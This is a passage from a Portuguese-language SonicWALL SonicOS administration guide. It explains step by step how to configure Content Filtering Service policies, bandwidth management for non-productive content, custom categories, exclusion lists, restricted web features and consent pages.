Etapa 2 Clique no boto Adicionar poltica e a janela Adicionar/editar poltica de Regras de
aplicativos ser exibida.
Etapa 3 Insira um nome descritivo para esta ao no campo Nome da poltica, como 'Bloquear
contedo proibido'.
Etapa 4 Selecione 'CFS' na lista suspensa Tipo de poltica.
Etapa 5 Da lista suspensa Objeto do aplicativo, selecione o objeto que voc criou na seo anterior.
No nosso exemplo, este objeto denominado 'Contedo proibido'.
Etapa 6 Da lista suspensa Ao, selecione' Pgina de bloqueio de CFS' para exibir uma pgina pr-
formatada de 'contedo bloqueado' quando os usurios tentarem acessar o contedo proibido.
Etapa 7 Opcionalmente, selecione os Usurios/Grupos a quem essa poltica dever ser Includa ou
Excluda na lista suspensa. Nosso exemplo usa os padres de incluir 'todos' e excluir 'nenhum'.
Etapa 8 Opcionalmente,, selecione um Cronograma de dias e horrios quando essa regra deve ser
aplicada na lista suspensa. Nosso exemplo usa 'Sempre ativa' para sempre aplicar esta
poltica.
Etapa 9 Opcionalmente,, selecione a caixa de seleo Registrar usando formato de mensagem CFS
se desejar que os logs usem este formato em vez do padro de formato de Regras de
aplicativo.
Etapa 10 Opcionalmente,, selecione a Zona apropriada onde a poltica deve ser aplicada. Nosso
exemplo usa 'LAN' para aplicar a poltica em todo o trfego atravessando a rede local.
Etapa 11 Opcionalmente,, selecione uma Lista de permisso de CFS para impor nessa poltica em
particular.
Etapa 12 Opcionalmente,, selecione a Lista de proibidos do CFS o apropriada para impor na poltica
especfica.
Etapa 13 Clique no boto OK para criar essa poltica.
Contedo de gerenciamento de largura de banda

Para criar uma Poltica de CFS para a aplicao de BWM a contedo no produtivo:
Criar um objeto de aplicativo para contedo no produtivos na pgina 1171
Criar um objeto de ao de gerenciamento de largura de banda na pgina 1172
Criar uma poltica de Regras de aplicativos para gerenciar contedo no-produtivo na
pgina 1172
Criar um objeto de aplicativo para contedo no produtivos
Crie um objeto de aplicativo com contedo no produtivo:
Etapa 1 Navegue para a pgina Firewall > Objetos de correspondncia na interface de

Etapa 2 Clique no boto Adicionar novo objeto de correspondncia e a janela Adicionar/editar
objeto de correspondncia ser exibida.

Etapa 3 Digite uma descrio em Nome de objeto, como 'Contedo no-produtivo'.
Etapa 4 Selecione 'Lista de categorias do CFS ' da lista suspensa Tipo de objeto de
correspondncia.
Etapa 5 Use as caixas de seleo para selecionar as categorias que deseja adicionar lista de
contedo.
Etapa 6 Clique no boto OK para adicionar o objeto lista de Objetos do aplicativo.
Criar um objeto de ao de gerenciamento de largura de banda
Embora regras de aplicativo contenham objetos de ao previamente configurado para

gerenciamento de largura de banda, um objeto de ao personalizado fornece maior controle,
incluindo a capacidade de gerenciar largura de banda por poltica ou por ao.
Configurar BWM em um objeto de ao na pgina 686 em Configuraes de firewall > BWM.
Criar uma poltica de Regras de aplicativos para gerenciar contedo no-produtivo
aplicativo:
SonicOS.
Etapa 3 Insira um nome descritivo para esta ao no campo Nome da poltica.
Etapa 5 Da lista suspensa Objeto do aplicativo, selecione o objeto que voc criou na seo anterior.
No nosso exemplo, este objeto denominado 'Contedo no-produtivo'.
Etapa 6 Da lista suspenda Ao, selecione 'Gerenciamento de largura de banda - 100 mil' para aplicar
essa regra BWM personalizada quando os usurios tentarem acessar o contedo no
produtivo.
Nota Se voc optar por no criar um objeto BWM personalizado, voc pode usar um dos objetos
de BWM predefinidos (BWM alto, BWM mdio ou BWM baixo).
Etapa 7 Opcionalmente, selecione os Usurios/Grupos a quem essa poltica dever ser Includa ou
Excluda na lista suspensa. Nosso exemplo usa os padres de incluir 'todos' e excluir 'nenhum'.
Etapa 8 Opcionalmente,, selecione um Cronograma de dias e horrios quando essa regra deve ser
aplicada na lista suspensa. Nosso exemplo usa a seleo Horas de trabalho' predefinida para
aplicar esta poltica somente durante horas de trabalho dos dias da semana.
Etapa 9 Opcionalmente,, selecione a caixa de seleo Registrar usando formato de mensagem CFS
se desejar que os logs usem este formato em vez do padro de formato de Regras de
aplicativo.
Etapa 10 Opcionalmente,, selecione a Zona apropriada onde a poltica deve ser aplicada. Nosso
exemplo usa 'LAN' para aplicar a poltica em todo o trfego atravessando a rede local.
Etapa 11 Clique no boto OK para criar essa poltica.

Aplicando polticas a vrios grupos
Esta seo detalha a aplicao de uma nica poltica a vrios grupos de usurios. O CFS
permite que o administrador aplique uma poltica a diferentes grupos, permitindo a variao
(em restries de tempo, excluses, etc...) no modo como ela aplicada a usurios.
Criar uma poltica de Regras de aplicativos especfica para um grupo
aplicativo:
SonicOS.
Etapa 3 Insira um nome descritivo para esta ao no campo Nome da poltica. Para facilitar a
identificao, esse nome pode incluir o grupo de usurios ao qual voc est aplicando a
poltica.
Etapa 5 Selecione um Objeto de aplicativo na lista suspensa. Nosso exemplo usa Contedo no-
produtivo'.
Etapa 6 Selecione um formulrio de Ao na lista suspensa. Nosso exemplo usa a ao 'BWM mdio'
predefinida para gerenciar a largura de banda do contedo aplicvel.
Etapa 7 Selecione os Usurios/Grupos a quem essa poltica dever ser Includa ou Excluda na lista
suspensa. Nosso exemplo usa o grupo Usurios confiveis', embora voc possa escolher um
grupo diferente ou personalizado, dependendo das suas necessidades.
Etapa 8 Selecione um Cronograma apropriado para este grupo. Nosso exemplo usa o cronograma
Horas de trabalho' predefinido.
Com isso, as selees neste exemplo, Contedo no-produtivo ser Largura de banda
gerenciada para Usurios confiveis somente durante Horas de trabalho.
Etapa 9 Clique no boto OK para criar essa poltica. A nova poltica exibe a lista Polticas de regras
de aplicativos.
Etapa 10 Repita as etapas 2-9 com as variaes exigidas pela sua implementao para criar uma
poltica para cada grupo necessrio.

Criao de uma categoria CFS personalizada
Essa seo detalha a criao de uma entrada de categoria CFS personalizada. O CFS permite
que o administrador no apenas crie Polticas personalizadas, mas tambm permite entradas
de nome de domnio personalizadas para as categorias de classificao CFS existentes. Isso
permite a insero de contedo gerenciado pelo CFS personalizado na estrutura de categoria
muito flexvel e existente.
As categorias personalizadas tm os seguintes limites:
Voc pode criar at 64 categorias personalizadas
Voc pode adicionar um nmero ilimitado de entradas manuais a cada categoria
personalizada.
Voc pode inserir at 500 domnios manualmente em todas as categorias personalizadas.
Vrias categorias personalizadas podem consultar a mesma categoria mapeada.
Para criar uma nova categoria personalizada de CFS:

Habilitar categorias personalizadas de CFS na pgina 1174
Adicionar uma nova entrada de categoria personalizada de CFS na pgina 1174
Habilitar categorias personalizadas de CFS
Etapa 1 Navegue at a pgina Servios de segurana > Filtro de contedo e clique na interface de
Etapa 2 Role para baixo e clique na seo Categoria personalizada do CFS e selecione a caixa de
seleo Habilitar categoria personalizada de CFS.
Etapa 3 Clique no boto Aceitar para salvar suas alteraes e ativar o recurso de Categoria
personalizada.
Adicionar uma nova entrada de categoria personalizada de CFS
Etapa 1 Novamente na pgina Servios de segurana > Filtro de contedo, role para baixo at a
seo Categoria personalizada do CFS e clique no boto Adicionar....
Etapa 2 Insira um nome descritivo em Nome para a entrada personalizada.
Etapa 3 Escolha a Categoria predefinida a qual essa entrada ser adicionada.
Etapa 4 Insira um nome de domnio ao campo Contedo.
Nota Todos os subdomnios do domnio inserido so afetados. Por exemplo, inserir "yahoo.com"
aplica-se a "mail.yahoo.com" e "my.yahoo.com", portanto, no necessrio digitar todas as
entradas FQDN para subdomnios de um domnio pai.
Etapa 5 Clique no boto OK para adicionar esta entrada personalizada.

Exemplos de filtragem de contedo de herana
As sees a seguir descrevem como definir as configuraes da pgina Servios de
segurana > Filtro de Contedo usando mtodos de Filtragem de contedo herdados.
Nota No possvel criar regras avanadas que utilizam o controle de polticas de filtro de
aplicativos e de gerenciamento de largura de banda ao usar o mtodo 'herdado' de
Filtragem de contedo. Para a criao de regra avanada, consulte a seo Viso geral de
Gerenciamento de Poltica CFS 3.0.
Status de filtro de contedo na pgina 1175

Tipo de filtro de contedo na pgina 1176
Restringir recursos da Web na pgina 1177
Domnios confiveis na pgina 1177
Lista de excluso CFS na pgina 1178
Poltica de CFS por faixa de endereo IP na pgina 1178
Pgina da Web a ser exibida ao bloquear na pgina 1179
Status de filtro de contedo

Se o CFS est ativado, a seo Status de filtro de contedo exibe o status do Servidor de
filtro de contedo, bem como a data e a hora em que a sua assinatura expira. A data de
vencimento e a hora so exibidas no formato do Cdigo de Hora Universal (UTC).
Tambm possvel acessar o formulrio Solicitao de reviso de classificao de URL do
SonicWALL CFS clicando no link aqui em Se voc suspeita que um site esteja classificado
incorretamente ou se deseja enviar uma nova URL para classificao, clique aqui.
Se o SonicWALL CFS no est ativado, voc deve adquirir uma assinatura de licena para a
funcionalidade de filtragem de contedo completo, incluindo Polticas de CFS personalizadas.
Se voc no tiver uma Chave de ativao, deve adquirir o SonicWALL CFS em um revendedor
SonicWALL ou na sua conta mysonicwall.com (limitado a clientes dos EUA e Canad).

Ativando o SonicWALL CFS
Se voc tem uma Chave de ativao para a sua assinatura do SonicWALL CFS, siga estas
etapas para ativar o SonicWALL CFS:
Aviso Voc deve ter uma conta mysonicwall.com e seu firewall deve ser registrado para ativar o
SonicWALL Client Anti-Virus.
Etapa 1 Clique no link Assinatura de Filtragem de contedo do SonicWALL na pgina Servios de

segurana > Filtro de contedo. A pgina Login no mysonicwall.com ser exibida.
Etapa 2 Insira seu nome de usurio e senha no mysonicwall.com nos campos Nome de usurio e
Senha e clique em Enviar. A pgina Sistema > Licenas exibida. Se o seu firewall j estiver
conectado sua conta mysonicwall.com, a pgina sistema > Licenas exibida aps voc
clicar no link Assinatura de Filtragem de contedo do SonicWALL.
Etapa 3 Clique em Ativar ou Renovar na coluna Gerenciar servio na tabela Gerenciar servios on-
line. Digite a Chave de ativao no campo Nova chave de licena e clique em Enviar. Sua
assinatura do SonicWALL CFS ativada no seu SonicWALL.
Etapa 4 Quando voc ativar o SonicWALL CFS em mysonicwall.com, a ativao do SonicWALL CFS
ativada automaticamente no seu SonicWALL dentro de 24 horas ou voc pode clicar no boto
Sincronizar na pgina Servios de segurana > Resumo para atualizar seu SonicWALL.
Ativando uma AVALIAO GRATUITA do SonicWALL CFS
Voc pode experimentar uma verso de AVALIAO GRATUITA do SonicWALL ao seguir

essas etapas:
Etapa 1 Clique no link AVALIAO GRATUITA na pgina Servios de segurana > Filtro de
contedo. A pgina Login no mysonicwall.com ser exibida.
Senha e clique em Enviar. A pgina Sistema > Licenas exibida. Se o seu SonicWALL j
estiver conectado sua conta mysonicwall.com, a pgina sistema > Licenas aparece aps
clicar no link AVALIAO GRATUITA.
Etapa 3 Clique em AVALIAO GRATUITA na coluna Gerenciar servio na tabela Gerenciar
servios on-line. Sua assinatura de teste do SonicWALL CFS ativada no seu SonicWALL.
Etapa 4 Selecione Servios de segurana > Filtro do contedo para exibir a pgina do Filtro do
contedo para configurao do SonicWALL Content Filtering Service.
Tipo de filtro de contedo

H dois tipos de filtragem de contedo disponveis no firewall. Essas opes esto disponveis
no menu Tipo de filtro de contedo.
SonicWALL CFS - Selecionar Servio de filtro de contedo como o Tipo de filtro de
contedo permite que voc acesse a funcionalidade do SonicWALL CFS includa com o
SonicOS e tambm configure as Polticas de CFS personalizadas que esto disponveis
apenas com uma assinatura vlida. possvel obter mais informaes sobre o SonicWALL
Content Filtering Service em http://www.sonicwall.com/products/cfs.html
Websense Enterprise -Websense Enterprise uma lista de filtro de contedo de terceiros
suportada por dispositivos de segurana de rede Dell SonicWALL.

Ao clicar no link Rede > Zonas em Nota: Impor a Filtragem de contedo por zona na pgina
Rede > Zona, exibe a pgina Rede > Zonas para habilitar o SonicWALL Content Filtering
Service nas zonas de rede.
Restringir recursos da Web

Restringir recursos da Web aprimora sua segurana de rede, bloqueando aplicativos da Web
potencialmente perigosos de entrem na sua rede.
Restringir recursos da Web est includo no SonicOS. Selecione qualquer um dos seguintes
aplicativos para bloquear:
ActiveX - uma linguagem de programao que incorpora scripts em pginas da Web.
Programadores mal-intencionados podem usar ActiveX para excluir arquivos ou
comprometer a segurana. Selecione a caixa de seleo ActiveX para bloquear controles
ActiveX.
Java - usado para baixar e executar pequenos programas, chamados applets, nos sites
da Web. mais seguro que ActiveX, uma vez que tem mecanismos de segurana
incorporados. Selecione a caixa de seleo Java para bloquear miniaplicativos Java na
rede.
Cookies - So usados por servidores Web para rastrear o uso da Web e lembrar a
identidade do usurio. Os cookies tambm podem comprometer a privacidade do usurio
rastreando as atividades da Web. Selecione a caixa de seleo Cookies para desativar
Cookies.
Acesso aos servidores proxy HTTP - Quando um servidor proxy est localizado no WAN,
os usurios LAN podem contornar a filtragem de contedo apontando seus computadores
para o servidor proxy. Marque esta caixa para impedir que os usurios da LAN acessem
servidores proxy na WAN.
Domnios confiveis
Domnios confiveis podem ser adicionados para permitir que o contedo de domnios
especficos seja isento da opo Restringir recursos da web.
Se voc confiar no contedo em domnios especficos e deseja que exclu-los de Restringir
recursos da Web, siga estas etapas para adicion-los:
Etapa 1 Selecione a caixa de seleo No bloquear Java/ActiveX/Cookies para sites de domnios

confiveis.
Etapa 2 Clique em Adicionar. A janela Adicionar entrada de domnio confivel exibida.
Etapa 3 Insira o nome de domnio confivel no campo Nome de domnio.
Etapa 4 Clique em OK. A entrada de domnio confivel adicionada na tabela Domnios confiveis.
Para manter as entradas de domnio confivel mas habilitar Restringir recursos da Web,
desmarque No bloquear Java/ActiveX/Cookies para domnios confiveis. Para excluir um
domnio confivel individual, clique no cone Excluir para a entrada. Para excluir todos os
Domnios confiveis, clique em Excluir todos. Para editar uma entrada de domnio confivel,
clique no cone Editar .

Lista de excluso CFS
Intervalos de endereo IP podem ser adicionados ou excludos da Lista de excluso CFS
manualmente. A Filtragem de contedo est desabilitada para endereos IP na Lista de
excluso CFS. Esses intervalos de endereo so tratados como Domnios confiveis.
Selecione Habilitar lista de excluso CFS para ativar este recurso.
A caixa de seleo No ignorar bloqueio de CFS para o administrador controla a filtragem
de contedo para administradores. Por padro, quando o administrador (usurio "admin") est
conectado interface de gerenciamento do SonicOS de um sistema, o bloqueio de CFS est
suspenso para tal Endereo IP do sistema pela durao da sesso autenticada. Se voc
preferir fornecer filtragem de contedo e aplicar polticas de CFS ao endereo IP do sistema
do administrador, selecione a caixa de seleo No ignorar bloqueio de CFS para o
administrador.
Adicionando domnios confiveis lista de excluso CFS
Para adicionar o intervalo de endereos IP Lista de excluso CFS, efetue as seguintes

tarefas:
Etapa 1 Selecione a caixa de seleo Habilitar lista de excluso CFS.

Etapa 2 Clique em Adicionar. A janela Entrada de intervalo de CFS exibida.
Etapa 3 Insira o primeiro endereo IP no intervalo no campo Endereo IP de: e o ltimo endereo IP
no campo Endereo IP at: . ..
Etapa 5 Clique em Aceitar na pgina Servios de segurana > Filtro de contedo. O intervalo de
endereo IP adicionado Lista de excluso CFS.
Modificando ou desativando temporariamente a Lista de excluso CFS
Para modificar ou desativar temporariamente a Lista de excluso CFS, efetue as seguintes

tarefas:
Etapa 1 Para manter as entradas da Lista de excluso CFS mas permitir temporariamente a filtragem
de contedo para ser aplicado a esses endereos IP, desmarque a caixa de seleo Habilitar
lista de excluso CFS.
Etapa 2 Para editar uma entrada de domnio confivel, clique no cone Editar .
Etapa 3 Para excluir um domnio confivel individual, clique no cone Excluir para a entrada.
Etapa 4 Para excluir todos os Domnios confiveis, clique em Excluir todos.
Poltica de CFS por faixa de endereo IP

Para configurar uma poltica CFS personalizada para um intervalo de endereos IP, efetue as
seguintes tarefas:

Etapa 1 Role para baixo at a seo Poltica de CFS por intervalo de endereo IP e selecione a caixa
de seleo Habilitar poltica por intervalo de endereo IP.
Etapa 2 Clique em Adicionar. A janela Adicionar Poltica de CFS por intervalo de endereo IP
exibida.
Etapa 3 Insira o primeiro endereo IP no intervalo no campo Endereo IP de: e o ltimo endereo IP
no campo Endereo IP at: . ..
Etapa 4 Selecione a poltica CFS a aplicar a este intervalo de endereo IP na janela suspensa Poltica
de CFS : janela suspensa.
Etapa 5 Como alternativa, adicione um comentrio sobre este intervalo de endereo IP no campo
Comentrio ..
Pgina da Web a ser exibida ao bloquear

Voc pode personalizar totalmente a pgina da Web que ser exibida para o usurio quando
houver tentativa de acesso a um site bloqueado. Para retornar para a pgina padro, clique no
boto Pgina bloqueada padro.
Configurando as propriedades de filtro do SonicWALL herdado

Voc pode personalizar os recursos de filtragem de contedo includos com o SonicOS da
janela Propriedades de Filtro do SonicWALL. Uma assinatura vlida para o SonicWALL CFS
Premium em um firewall executando o SonicOS permite que voc crie polticas personalizadas
para aplicar a grupos de usurios especficos. A poltica Padro do CFS Premium usada
como base de filtragem de contedo para todos os usurios no atribudos a uma poltica
personalizada especfica.
Nota O SonicWALL recomenda que voc faa a poltica Padro do CFS Premium a poltica mais
restritiva. Polticas CFS Personalizadas esto sujeitas a herana de filtro de contedo. Isso
significa que todas as polticas personalizadas de CFS herdam os filtros da poltica Padro
do CFS. Para garantir a correta filtragem de contedo, a poltica Padro do CFS deve ser
configurada para ser a poltica mais restritiva, em seguida, cada poltica personalizada deve
ser configurada para conceder privilgios que so restritos poltica Padro.
Para exibir a janela Propriedades de Filtro do SonicWALL, selecione SonicWALL CFS da

lista suspensa Tipo de filtro de contedo na pgina Servios de segurana > Filtro de
Contedo e, em seguida, clique em Configurar. A janela Propriedades de filtro do
SonicWALL exibida. Para obter informaes de configurao sobre as configuraes de
propriedades de filtro, consulte as sees a seguir:
CFS na pgina 1180
Poltica na pgina 1181
Lista personalizada na pgina 1185
Consentimento na pgina 1187

CFS
A guia CFS permite que voc ative a Filtragem de contedo de HTTPS com base em IP,
bloqueie ou permita trfego para sites quando o servidor estiver indisponvel e defina suas
preferncias para o cache de URL.
Configuraes
A seo Configuraes permite que voc ative a filtragem de contedo HTTPS, selecione o
que deseja que o firewall faa se o servidor estiver indisponvel e o que ele dever fazer
quando houver tentativa de acesso a um site da Web proibido.
Habilitar filtragem de contedo HTTPS - Selecione esta caixa de seleo para ativar a
filtragem de contedo de HTTPS. A filtragem de contedo HTTPS se baseia no IP e no
inspecionar o URL. Embora a filtragem de contedo HTTP possa executar
redirecionamentos para impor autenticao ou fornecer uma pgina de bloqueio, as
pginas filtradas HTTP sero bloqueadas silenciosamente. Voc deve fornecer o endereo
IP de qualquer site da Web HTTPS a ser filtrado.
Habilitar failover de servidor CFS Marque esta caixa de seleo para fornecer
redundncia de servidor CFS e alta disponibilidade.
Habilitar modo de cabo de CFS Selecione esta caixa de seleo para habilitar as
implantaes de Modo de cabo do CFS.
Se o servidor ficar indisponvel por (segundos) - Define a quantidade de tempo depois
que o servidor de filtro de contedo ficar indisponvel at que o firewall execute a ao de
bloquear acesso a todos os sites da Web ou permitir que o trfego continue a todos os sites
da Web.
Nota Se o servidor estiver indisponvel, o firewall pode permitir acesso a sites da Web na
memria do cache. Isso significa que, ao selecionar a caixa de seleo Bloquear o
trfego para todos os sites da Web, o firewall s ir bloquear sites da Web que
no esto na memria do cache.

Bloquear o trfego para todos os sites da Web - Selecione esse recurso se voc
deseja que o firewall bloqueie o acesso a todos os sites da Web at que o servidor de
filtro de contedo esteja disponvel.
Permitir o trfego para todos os sites da Web - Selecione esse recurso se voc
deseja permitir o acesso a todos os sites da Web quando o servidor de filtro de
contedo no estiver disponvel. No entanto, Domnios proibidos e Palavras-chave, se
ativados, ainda sero bloqueados.
Se o URL marcado como proibido - Se voc tiver habilitado o bloqueio por Categorias e
o URL estiver bloqueado pelo servidor, h duas opes disponveis.
Bloquear acesso ao URL - Selecionar esta opo impede que o navegador exiba o
URL solicitado ao usurio.
Registrar acesso ao URL - Selecionar esta opo registra a solicitao do URL no
arquivo de registro.
Cache de URL
A seo de Cache de URL permite que voc configure o tamanho do cache de URL no firewall.
Dica Um tamanho de cache de URL maior pode fornecer melhorias perceptveis na navegao
na Internet em tempos de resposta.
Exame da classificao de URL

Se voc suspeita de que um site da Web esteja classificado incorretamente ou se quiser enviar
uma nova URL para classificao, pode clicar em aqui no link para exibir o formulrio
SonicWALL CSF Solicitao de reviso de classificao de URL para enviar a solicitao.
Isso tambm pode ser usado para exibir a classificao de um URL.
No formulrio Solicitao de reviso de classificao de URL do SonicWALL CFS, insira
um URL e clique em Enviar. Uma descrio do URL exibida. Voc pode selecionar
Solicitao de classificao para solicitar que um URL seja classificados ou que a
classificao seja alterada.
Poltica
A guia Poltica s ficar visvel se o firewall tiver uma assinatura do SonicWALL CFS Premium.
A guia Poltica permite que voc modifique a poltica Padro do CFS e crie polticas
personalizadas de CFS, que, em seguida, voc poder aplicar a grupos especficos de
usurios na pgina Usurios > Grupos locais. A poltica Padro do CFS sempre herdada

por cada usurio. Uma poltica CFS personalizada permite que voc modifique a configurao
do CFS padro para adequar as polticas de filtragem de contedo para grupos de usurios
determinados em sua rede.
Nota Para garantir a correta filtragem de contedo, a poltica Padro do CFS deve ser
configurada para ser a poltica mais restritiva, em seguida, cada poltica personalizada deve
ser configurada para conceder privilgios que so restritos poltica Padro.
Criando uma poltica CFS personalizada
Polticas CFS personalizadas s podem ser criadas quando o dispositivo possui uma
assinatura vlida para o SonicWALL CFS Premium.
Para criar uma nova poltica:
Etapa 1 Clique em Adicionar para exibir a janela Adicionar poltica de CFS.

Etapa 2 Na janela Adicionar poltica de CFS, na guia Poltica, insira um nome para a poltica no
campo Nome.
Etapa 3 Clique na guia Lista de URL.

Etapa 4 Na lista Selecionar categorias proibidas, desmarque qualquer categoria qual voc deseja
permitir o acesso. Mova seu ponteiro do mouse sobre as setas para cima e baixo para
percorrer a lista de categorias do CFS automaticamente. Selecione a caixa de seleo
Selecionar todas as categorias se voc deseja bloquear todas as categorias ou desmarque-
as para remover todas as categorias.
Etapa 5 Clique na guia Configuraes.
Etapa 6 Em Configuraes de lista personalizada, selecione qualquer uma das seguintes

configuraes:
Origem de domnios permitidos - Selecione esta configurao para desabilitar os
domnios permitidos que esto listados na guia Lista personalizada na janela
Propriedades de filtro do SonicWALL.
Origem de domnios proibidos - Selecione esta configurao para habilitar os
domnios proibidos que esto listados na guia Lista personalizada na janela
Origem de palavra-chave - Selecione esta configurao para habilitar o bloqueio de
palavra-chave para os URLs que esto listados na guia Lista personalizada na janela
Etapa 7 Em Configuraes da imposio de pesquisa segura, selecione Habilitar a imposio de
pesquisa segura para habilitar as opes de navegao segura para determinados
mecanismos de pesquisa, como Google e Yahoo.
Etapa 8 Para configurar o agendamento para imposio de Filtragem de contedo, selecione uma
das seguintes opes na lista suspensa Filtrar URLs proibidas por perodo do dia:
Sempre ativado - Quando selecionado, a Filtragem de contedo imposta em todos
os momentos.

De/Para - Quando selecionado, a Filtragem de contedo imposta durante a hora e
os dias especificados. Insira o perodo de tempo em formato de 24 horas e selecione
os dias inicial e final da semana em que a Filtragem de contedo ser imposta. As
opes incluem tambm as horas de trabalho e horas de fim de semana.
Configurando a poltica de CFS padro
A poltica Padro exibida na tabela Polticas.

Para configurar a poltica Padro para ser a mais restritiva:
Etapa 1 Clique no cone Editar na coluna Configurar. A janela Editar poltica de CFS exibida.
Etapa 2 Clique na guia Lista de URL.
Etapa 3 Selecione as caixas de seleo para categorias adicionais que deseja filtrar. Para selecionar
todas as categorias do CFS Premium, selecione a caixa de seleo Selecionar todas as
categorias.
Etapa 4 Se voc deseja remover o bloqueio de CFS de categorias especficas, desmarque a caixa de
seleo para a categoria. Mova o seu ponteiro nos botes para cima ou para baixo para
navegar pela lista de categorias.
Dica As restries de Hora do dia se aplicam somente Lista de filtro de contedo, bloqueio
Personalizado e bloqueio de Palavra-chave. Restringir recursos da Web e Consentimento
no so afetados.

Lista personalizada
Voc pode personalizar seu URL lista para incluir Domnios permitidos e Domnios
proibidos. Personalizando sua lista de URLs, voc pode incluir domnios especficos para ser
acessados, bloqueados e incluir palavras-chave especficas para bloquear sites. As
configuraes disponveis na pgina de Lista personalizada so diferentes para um dispositivo
com uma assinatura vlida do SonicWALL CFS Premium em comparao com o que est
disponvel para um dispositivo sem licena CFS Premium. A imagem abaixo mostra a pgina
de Lista personalizada de um dispositivo com uma assinatura ativa do CFS Premium.
Para um dispositivo com uma assinatura do CFS Premium, estes recursos so controlados por
cada Poltica. Para habilitar ou desabilitar qualquer um dos recursos nesta pgina, consulte
Ativando ou desativando em dispositivos com uma assinatura do CFS Premium na
pgina 1186.
Para um dispositivo com uma assinatura do CFS Premium, consulte Ativando ou desativando
em dispositivos sem uma assinatura CFS Premium na pgina 1186.
Para permitir acesso a um site da Web que est bloqueado pela Lista de filtro de contedo,
clique em Adicionar, insira o nome do host, como www.ok-site.com no campo Domnios
permitidos. 1.024 entradas podem ser adicionadas lista Domnios permitidos.
Para bloquear um site da Web que no esteja bloqueado pelo Servio de filtro de contedo,
clique em Adicionar e digite o nome de host, como "www.bad-site.com" no campo Domnios
proibidos. 1.024 entradas podem ser adicionadas lista Domnios proibidos.
Aviso No inclua o prefixo "http://" nos campos de Domnios permitidos ou Domnios proibidos.
Todos os subdomnios sero afetados. Por exemplo: inserir yahoo.com afetar
mail.yahoo.com e my.yahoo.com.
Para habilitar o bloqueio usando Palavras-chave, clique em Adicionar em Bloqueio de

palavra-chave e digite a palavra-chave para bloquear no campo Adicionar palavra-chave.
Para remover um domnio confivel ou proibido, selecione-o da lista e clique no boto Excluir.
Quando o domnio for excludo, a barra de Status exibe Pronto.
Para remover uma palavra-chave, selecione-a na lista e clique em Excluir. Quando a palavra-
chave for excluda, a barra de Status exibe Pronto.

Clique em OK quando terminar.
Ativando ou desativando Domnios permitidos/proibidos ou Bloqueio de palavra-chave
Por padro, a lista de Domnios permitidos desativada e a lista de Domnios proibidos e

a lista de Bloqueio de palavra-chave esto habilitadas. Quando o SonicWALL CFS Premium
est licenciado no dispositivo, essas configuraes so controladas em uma base por poltica.
Sem uma assinatura atual do SonicWALL CFS Premium, estas configuraes esto
disponveis na guia Lista personalizada, na parte inferior da pgina.
Ativando ou desativando em dispositivos com uma assinatura do CFS Premium
Para ativar ou desativar os recursos de Domnios permitidos/proibidos ou de Bloqueio de

palavra-chave quando o firewall tiver uma assinatura do SonicWALL CFS Premium:
Etapa 1 Na pgina Servios de segurana > Filtro de contedo, selecione Servios de filtro de
contedo em Tipo de filtro de contedo e clique em Configurar.
Etapa 2 Na pgina Propriedades de filtro do SonicWALL, clique na guia Poltica.
Etapa 3 Clique no cone Editar na coluna Configurar em Poltica para a que deseja ativar ou desativar
os recursos.
Etapa 4 Na janela Editar poltica de CFS, clique na guia Configuraes.
Etapa 5 Em Configuraes de lista personalizada, selecione qualquer uma das seguintes
configuraes:
domnios permitidos que esto listados na guia Lista personalizada. Os domnios na
lista Domnios permitidos no sero isentos da filtragem de contedo.
Origem de domnios proibidos - Selecione esta configurao para habilitar a
filtragem (bloqueio) de domnios proibidos que esto listados na guia Lista
personalizada.
Origem de palavra-chave - Selecione esta configurao para habilitar o Bloqueio de
palavra-chave para os URLs que esto listados na guia Lista personalizada.
Ativando ou desativando em dispositivos sem uma assinatura CFS Premium

Para ativar ou desativar os recursos de Domnios permitidos/proibidos ou de Bloqueio de
palavra-chave quando o firewall no tiver uma assinatura do SonicWALL CFS Premium:
Etapa 1 Na guia Lista personalizada, na parte inferior da pgina, selecione uma das seguintes
configuraes:
domnios permitidos que esto listados na guia Lista personalizada. Os domnios na
lista Domnios permitidos no sero isentos da filtragem de contedo.
Origem de domnios proibidos - Selecione esta configurao para habilitar a
filtragem (bloqueio) de domnios proibidos que esto listados na guia Lista
personalizada.
Origem de palavra-chave - Selecione esta configurao para habilitar o Bloqueio de
palavra-chave para os URLs que esto listados na guia Lista personalizada.

Desabilitar todo o trfego da Web, exceto para Domnios permitidos
Selecionar a caixa de seleo Desabilitar trfego da Web exceto para Domnios permitidos
faz com que o firewall permita o acesso Web apenas para sites da lista de Domnios
permitidos. Com cuidado na triagem, isso pode ser quase 100% eficaz para bloquear
pornografia e outros contedos censurveis.
A caixa de seleo Desabilitar trfego da Web exceto para Domnios permitidos no est
disponvel quando o firewall possui uma assinatura do SonicWALL CFS vlida. Nesse caso,
voc pode configurar uma Poltica de CFS para bloquear sites da Web indesejveis.
Consentimento
A guia Consentimento permite que voc aplique a filtragem de contedo em computadores
designados e fornea a filtragem opcional em outros computadores. O consentimento pode ser
configurado para precisar que os usurios aceitem os termos descritos em uma janela de
poltica de uso aceitvel antes de ser permitida a navegao na Web.
Para habilitar as propriedades de Consentimento, selecione Exigir consentimento.
Mximo de uso da Web (minutos) - Em um ambiente onde h mais usurios do que
computadores, como uma sala de aula ou biblioteca, limites de tempo geralmente so
impostos. O firewall pode ser usado para lembrar os usurios quando o tempo expirou ao
exibir a pgina definida no campo de URL da pgina de Consentimento. Insira o limite de
tempo, em minutos, no campo Mximo de uso da Web. Quando o valor padro de zero
(0) inserido, este recurso est desabilitado.
Tempo limite ocioso por usurio (minutos) - Aps um perodo de inatividade do
navegador da Web, o firewall requer que o usurio concorde com os termos descritos na
pgina de Consentimento antes de acessar a Internet novamente. Para configurar o valor,
siga o link para a janela de Usurios e insira o valor desejado na seo de Tempo limite
ocioso por usurio.
URL da pgina de consentimento (filtragem opcional) - Quando um usurio abre o
navegador da Web em um computador que requer consentimento, exibida uma pgina
de consentimento e dada a opo de acessar a Internet com ou sem o filtro de contedo.
Esta pgina deve ser encontrada em um servidor Web e estar acessvel como URI aos
usurios na rede. Pode conter o texto de, ou links para uma Poltica de Uso Aceitvel
(AUP). Esta pgina deve conter links para duas pginas contidas no firewall que, quando
selecionados, informam o dispositivo de que o usurio deseja ter acesso filtrado e no
filtrado. O link para acesso no filtrado deve ser <192.168.168.168/iAccept.html> e o link
para o acesso filtrado deve ser <192.168.168.168/iAcceptFilter.html>, onde o endereo IP
da LAN SonicWALL usado em vez de 192.168.168.168"\.
URL de aceitao de consentimento (filtragem desativada) - Quando um usurio aceita
os termos descritos na pgina de Consentimento e escolhe o acesso Internet sem a
proteo de Filtragem de contedo, exibida uma pgina da Web para confirmar sua
